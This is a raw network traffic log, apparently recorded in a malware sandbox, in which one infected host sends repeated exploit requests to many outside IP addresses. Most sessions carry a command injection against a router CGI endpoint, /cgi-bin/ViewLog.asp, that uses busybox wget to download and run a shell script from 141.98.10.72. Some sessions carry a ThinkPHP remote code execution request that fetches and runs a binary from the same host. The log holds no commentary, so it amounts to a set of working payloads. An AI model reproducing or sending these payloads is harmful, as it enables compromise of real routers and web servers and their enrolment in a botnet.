Feb 14, 2024 09:29:29.626437902 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:50.105617046 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:31.064544916 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.15	52038	94.121.72.94	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:10.076415062 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.15	43592	94.122.18.228	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:10.079962015 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.15	45582	94.123.187.241	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:10.080327034 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.15	57128	94.122.211.252	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:12.501373053 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.15	52324	31.136.86.213	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:12.703337908 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:13.338588953 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.586695910 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:17.082483053 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:22.202483892 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:32.186120033 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:52.153501987 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:33.112306118 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.15	59896	94.196.108.236	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:12.719255924 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:12.959783077 CET	83	IN	HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.15	44408	94.140.80.167	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:12.732383966 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.15	38930	94.121.55.90	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:12.749171972 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.15	58452	94.123.103.125	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:12.750796080 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.15	55850	112.126.91.177	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:13.338241100 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:13.724419117 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:13 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.15	43958	94.230.156.51	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:13.504389048 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.650679111 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.886499882 CET	339	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 11:24:39 GMT Server: Boa/0.94.14rc18 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.15	50372	95.158.186.97	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:13.505382061 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.682605028 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.922130108 CET	59	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.15	35010	94.120.165.98	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:13.522249937 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.15	60442	95.43.199.250	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:13.571891069 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.15	43732	31.136.32.60	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:13.977024078 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.618576050 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:15.866646051 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:18.362451077 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:23.482391119 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:33.466006994 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:54.201436043 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
